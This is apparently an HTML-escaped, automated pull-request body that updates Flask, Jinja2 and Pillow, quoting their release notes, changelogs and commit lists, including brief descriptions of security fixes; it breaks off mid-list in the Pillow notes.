href=\"https://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-3\"\u003ehttps://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-3\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/22?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/22?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.2\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.1.0\"\u003e2.1.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-2\"\u003ehttps://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/21?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/21?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.1\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.1.0\"\u003e2.1.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/flask/blob/main/CHANGES.rst\"\u003eflask's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.2.5\u003c/h2\u003e\n\u003cp\u003eReleased 2023-05-02\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate for compatibility with Werkzeug 2.3.3.\u003c/li\u003e\n\u003cli\u003eSet \u003ccode\u003eVary: Cookie\u003c/code\u003e header when the session is accessed, modified, or refreshed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.4\u003c/h2\u003e\n\u003cp\u003eReleased 2023-04-25\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate for compatibility with Werkzeug 2.3.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.3\u003c/h2\u003e\n\u003cp\u003eReleased 2023-02-15\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAutoescape is enabled by default for \u003ccode\u003e.svg\u003c/code\u003e template files. :issue:\u003ccode\u003e4831\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix the type of \u003ccode\u003etemplate_folder\u003c/code\u003e to accept \u003ccode\u003epathlib.Path\u003c/code\u003e. :issue:\u003ccode\u003e4892\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003e--debug\u003c/code\u003e option to the \u003ccode\u003eflask run\u003c/code\u003e command. :issue:\u003ccode\u003e4777\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.2\u003c/h2\u003e\n\u003cp\u003eReleased 2022-08-08\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Werkzeug dependency to \u0026gt;= 2.2.2. This includes fixes related\nto the new faster router, header parsing, and the development\nserver. :pr:\u003ccode\u003e4754\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix the default value for \u003ccode\u003eapp.env\u003c/code\u003e to be \u003ccode\u003e\u0026quot;production\u0026quot;\u003c/code\u003e. This\nattribute remains deprecated. :issue:\u003ccode\u003e4740\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.1\u003c/h2\u003e\n\u003cp\u003eReleased 2022-08-03\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSetting or accessing \u003ccode\u003ejson_encoder\u003c/code\u003e or \u003ccode\u003ejson_decoder\u003c/code\u003e raises a\ndeprecation warning. :issue:\u003ccode\u003e4732\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/47af817c8fe01045c641b97f8fb784c7ad864eee\"\u003e\u003ccode\u003e47af817\u003c/code\u003e\u003c/a\u003e release version 2.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/afd63b16170b7c047f5758eb910c416511e9c965\"\u003e\u003ccode\u003eafd63b1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5109\"\u003e#5109\u003c/a\u003e from pallets/backport-vary-cookie\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/8646edca6f47e2cd57464081b3911218d4734f8d\"\u003e\u003ccode\u003e8646edc\u003c/code\u003e\u003c/a\u003e set \u003ccode\u003eVary: Cookie\u003c/code\u003e header consistently for session\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/a6367dac747c1e149c60767eee7e8aa9c281c58e\"\u003e\u003ccode\u003ea6367da\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5108\"\u003e#5108\u003c/a\u003e from pallets/werkzeug-compat\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/3fbfbad79fe294918459b70eb409d555b20de2c8\"\u003e\u003ccode\u003e3fbfbad\u003c/code\u003e\u003c/a\u003e werkzeug 2.3.3 compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/726d3f4fa9e8a2960541debc2d2713571da54441\"\u003e\u003ccode\u003e726d3f4\u003c/code\u003e\u003c/a\u003e start version 2.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/ddc7accaa2e83b328f969c120af2ce0804876b4a\"\u003e\u003ccode\u003eddc7acc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5081\"\u003e#5081\u003c/a\u003e from pallets/release-2.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/74e03298200e33951ca350a35aa3a8c0b4ff8177\"\u003e\u003ccode\u003e74e0329\u003c/code\u003e\u003c/a\u003e release version 2.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/2d460685b1b3d66c713739ee91183c22fb2e5dc8\"\u003e\u003ccode\u003e2d46068\u003c/code\u003e\u003c/a\u003e update dev env\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/64bc45874daf4b9828830ea0037a19beb8364ee3\"\u003e\u003ccode\u003e64bc458\u003c/code\u003e\u003c/a\u003e update dev dependencies\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/flask/compare/0.9...2.2.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jinja2` from 2.6 to 3.1.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/releases\"\u003ejinja2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.6\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.6 security release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.6/\"\u003ehttps://pypi.org/project/Jinja2/3.1.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\"\u003ehttps://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup, allowing the sandbox to apply its checks. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\"\u003ehttps://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.5\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.5 security fix release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.5/\"\u003ehttps://pypi.org/project/Jinja2/3.1.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/changes/#version-3-1-5\"\u003ehttps://jinja.palletsprojects.com/changes/#version-3-1-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/jinja/milestone/16?closed=1\"\u003ehttps://github.com/pallets/jinja/milestone/16?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as by passing a stored reference to a filter that calls its argument. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h\"\u003eGHSA-q2x7-8rv6-6q7h\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid issues with names that contain f-string syntax. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1792\"\u003e#1792\u003c/a\u003e, \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699\"\u003eGHSA-gmj6-6f8f-6699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence types. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1952\"\u003e#1952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment when calling block references. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1701\"\u003e#1701\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another async-aware filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1781\"\u003e#1781\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1921\"\u003e#1921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e call. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e objects. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2025\"\u003e#2025\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2061\"\u003e#2061\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were searched. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not contain the templates directory. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1705\"\u003e#1705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1880\"\u003e#1880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1870\"\u003e#1870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTests decorated with \u003ccode\u003e@pass_context\u003c/code\u003e can be used with the \u003ccode\u003e|select\u003c/code\u003e filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1624\"\u003e#1624\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e for multiple assignment (\u003ccode\u003ea, b = 1, 2\u003c/code\u003e) does not fail when the target is a namespace attribute. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1413\"\u003e#1413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e in all branches of \u003ccode\u003e{% if %}{% elif %}{% else %}\u003c/code\u003e blocks does not cause the variable to be considered initially undefined. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1253\"\u003e#1253\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.4\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.4 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.4/\"\u003ehttps://pypi.org/project/Jinja2/3.1.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\"\u003ehttps://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003exmlattr\u003c/code\u003e filter does not allow keys with \u003ccode\u003e/\u003c/code\u003e solidus, \u003ccode\u003e\u0026gt;\u003c/code\u003e greater-than sign, or \u003ccode\u003e=\u003c/code\u003e equals sign, in addition to disallowing spaces. Regardless of any validation done by Jinja, user input should never be used as keys to this filter, or must be separately validated first. GHSA-h75v-3vvj-5mfj\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 3.1.x feature branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\"\u003eGHSA-h5c8-rqwp-cp95\u003c/a\u003e. You are affected if you are using \u003ccode\u003exmlattr\u003c/code\u003e and passing user input as attribute keys.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/blob/main/CHANGES.rst\"\u003ejinja2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.1.6\u003c/h2\u003e\n\u003cp\u003eReleased 2025-03-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup,\nallowing the sandbox to apply its checks. :ghsa:\u003ccode\u003ecpwx-vrp4-4pq7\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.1.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-12-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as\nby passing a stored reference to a filter that calls its argument.\n:ghsa:\u003ccode\u003eq2x7-8rv6-6q7h\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid\nissues with names that contain f-string syntax.\n:issue:\u003ccode\u003e1792\u003c/code\u003e, :ghsa:\u003ccode\u003egmj6-6f8f-6699\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence\ntypes. :issue:\u003ccode\u003e2032\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e.\n:pr:\u003ccode\u003e1952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends.\n:pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment\nwhen calling block references. :issue:\u003ccode\u003e1701\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another\nasync-aware filter. :issue:\u003ccode\u003e1781\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation.\n:issue:\u003ccode\u003e1921\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e\ncall. :issue:\u003ccode\u003e2021\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e\nobjects. :issue:\u003ccode\u003e2025\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object.\n:issue:\u003ccode\u003e2027\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. :pr:\u003ccode\u003e2061\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were\nsearched. :issue:\u003ccode\u003e1661\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not\ncontain the templates directory. :issue:\u003ccode\u003e1705\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. :pr:\u003ccode\u003e1880\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. :pr:\u003ccode\u003e1870\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/15206881c006c79667fe5154fe80c01c65410679\"\u003e\u003ccode\u003e1520688\u003c/code\u003e\u003c/a\u003e release version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403\"\u003e\u003ccode\u003e90457bb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/065334d1ee5b7210e1a0a93c37238c86858f2af7\"\u003e\u003ccode\u003e065334d\u003c/code\u003e\u003c/a\u003e attr filter uses env.getattr\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/033c20015c7ca899ab52eb921bb0f08e6d3dd145\"\u003e\u003ccode\u003e033c200\u003c/code\u003e\u003c/a\u003e start version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/bc68d4efa99c5f77334f0e519628558059ae8c35\"\u003e\u003ccode\u003ebc68d4e\u003c/code\u003e\u003c/a\u003e use global contributing guide (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/247de5e0c5062a792eb378e50e13e692885ee486\"\u003e\u003ccode\u003e247de5e\u003c/code\u003e\u003c/a\u003e use global contributing guide\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/ab8218c7a1b66b62e0ad6b941bd514e3a64a358f\"\u003e\u003ccode\u003eab8218c\u003c/code\u003e\u003c/a\u003e use project advisory link instead of global\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/b4ffc8ff299dfd360064bea4cd2f862364601ad2\"\u003e\u003ccode\u003eb4ffc8f\u003c/code\u003e\u003c/a\u003e release version 3.1.5 (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2066\"\u003e#2066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/877f6e51be8e1765b06d911cfaa9033775f051d1\"\u003e\u003ccode\u003e877f6e5\u003c/code\u003e\u003c/a\u003e release version 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/8d588592653b052f957b720e1fc93196e06f207f\"\u003e\u003ccode\u003e8d58859\u003c/code\u003e\u003c/a\u003e remove test pypi\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/jinja/compare/2.6...3.1.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pillow` from 1.7.7 to 10.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-pillow/Pillow/releases\"\u003epillow's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.3.0\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html\"\u003ehttps://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eDeprecations\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate eval(), replacing it with lambda_eval() and unsafe_eval() \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7927\"\u003e#7927\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eDeprecate ImageCms constants and versions() function \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7702\"\u003e#7702\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanges\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-28219: Use strncpy to avoid buffer overflow \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7928\"\u003e#7928\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003efunctools.lru_cache\u003c/code\u003e for \u003ccode\u003ehopper()\u003c/code\u003e \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7912\"\u003e#7912\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError if seeking to greater than offset-sized integer in TIFF \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7883\"\u003e#7883\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eImprove speed of loading QOI images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7925\"\u003e#7925\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded RGB to I;16N conversion \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7920\"\u003e#7920\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdd --report argument to \u003cstrong\u003emain\u003c/strong\u003e.py to omit supported formats \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7818\"\u003e#7818\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded RGB to I;16, I;16L and I;16B conversion \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7918\"\u003e#7918\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix editable installation with custom build backend and configuration options \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7658\"\u003e#7658\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix putdata() for I;16N on big-endian \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7209\"\u003e#7209\u003c/a\u003e [\u003ca href=\"https://github.com/Yay295\"\u003e\u003ccode\u003e@​Yay295\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eDetermine MPO size from markers, not EXIF data \u003ca 